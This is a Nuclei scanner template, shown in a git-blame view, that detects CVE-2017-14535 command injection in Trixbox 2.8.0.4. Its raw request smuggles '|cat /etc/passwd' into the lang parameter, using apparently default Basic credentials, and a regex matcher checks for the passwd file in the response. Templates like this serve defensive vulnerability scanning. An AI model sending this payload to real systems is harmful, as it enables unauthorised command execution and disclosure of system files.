2021-05-31 09:46:53 +00:00
|
|
|
id: CVE-2017-14535
|
|
|
|
|
|
|
|
info:
|
2022-04-07 13:53:15 +00:00
|
|
|
name: Trixbox - 2.8.0.4 OS Command Injection
|
2021-05-31 09:46:53 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-04-22 10:38:41 +00:00
|
|
|
description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
|
|
|
|
- https://www.exploit-db.com/exploits/49913
|
2022-04-07 13:53:15 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2017-14535
|
|
|
|
cwe-id: CWE-78
|
2022-04-07 13:53:15 +00:00
|
|
|
tags: cve,cve2017,trixbox,rce,injection
|
2021-05-31 09:46:53 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
2021-06-01 05:36:13 +00:00
|
|
|
GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1
|
2021-05-31 09:46:53 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
|
|
|
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
|
|
|
|
Connection: close
|
2021-06-01 05:36:13 +00:00
|
|
|
Cache-Control: max-age=0
|
2021-05-31 09:46:53 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-05-31 09:46:53 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-04-07 13:53:15 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/04/01
|